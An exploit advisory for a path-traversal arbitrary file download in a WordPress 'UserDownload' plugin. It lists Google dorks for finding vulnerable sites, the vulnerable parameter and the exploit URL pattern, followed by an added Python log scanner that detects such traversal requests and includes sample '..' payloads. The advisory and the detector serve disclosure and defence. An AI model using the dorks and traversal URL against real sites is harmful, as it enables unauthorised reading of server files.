KingSkrupellos

WordPress 5.1.1 UserDownload Themes Arbitrary File Download

Mar 18th, 2019
############################################################################################

# Exploit Title : WordPress 5.1.1 UserDownload Themes Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/03/2019
# Vendor Homepages : thedesignmill.com.au - jessebirch.com.au - ontopseo.com.au
# Software Information Link : jessebirch.com.au/website-design.html
ontopseo.com.au/about-us/
# Software Affected Version : 5.1.1
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:"/wp-content/plugins/userdownload/"
intext:SEO Services by ONTOP SEO
intext:Website design by Jesse Birch Design & Illustration
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

############################################################################################

# Impact :
***********
* WordPress 5.1.1 UserDownload Themes is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the web server process and obtain potentially sensitive information.
* An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.
* The software has a Relative Path Traversal vulnerability: it uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.

############################################################################################

# Vulnerable File :
****************
/download.php

# Vulnerable Parameter :
**********************
?download_file=

# Arbitrary File Download Exploit :
*******************************
/wp-content/plugins/userdownload/download.php?download_file=[FILENAME]

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

############################################################################################
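
For defenders reviewing web server logs, the following added example (not part of the original advisory and not the plugin's code) flags requests to the endpoint and parameter named above whose download_file value contains a ".." segment or an absolute path, including percent-encoded and double-encoded forms. The combined access log format and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path and parameter named in the advisory.
VULN_PATH = "/wp-content/plugins/userdownload/download.php"
PARAM = "download_file"
# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so %252e%252e is seen as '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if the value contains a '..' path segment or is an absolute path."""
    norm = fully_decode(value).replace("\\", "/")
    return norm.startswith("/") or bool(re.match(r"^[A-Za-z]:", norm)) or ".." in norm.split("/")

def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for flagged requests to the plugin endpoint."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if fully_decode(url.path).lower() != VULN_PATH:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if is_traversal(value):
                hits.append((lineno, fully_decode(value)))
    return hits

# Constructed sample entries (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Mar/2019:10:00:01 +0000] "GET /wp-content/plugins/userdownload/download.php?download_file=brochure.pdf HTTP/1.1" 200 5120',
    '203.0.113.9 - - [18/Mar/2019:10:00:07 +0000] "GET /wp-content/plugins/userdownload/download.php?download_file=../../example.txt HTTP/1.1" 200 312',
    '203.0.113.9 - - [18/Mar/2019:10:00:09 +0000] "GET /wp-content/plugins/userdownload/download.php?download_file=%252e%252e%252fexample.txt HTTP/1.1" 200 312',
    '203.0.113.7 - - [18/Mar/2019:10:00:12 +0000] "GET /index.php?download_file=../x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for lineno, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {lineno}: download_file={value!r}")
```

A hit shows only that a traversal-style value was requested; the response status and size on the same log line indicate whether a file was actually returned.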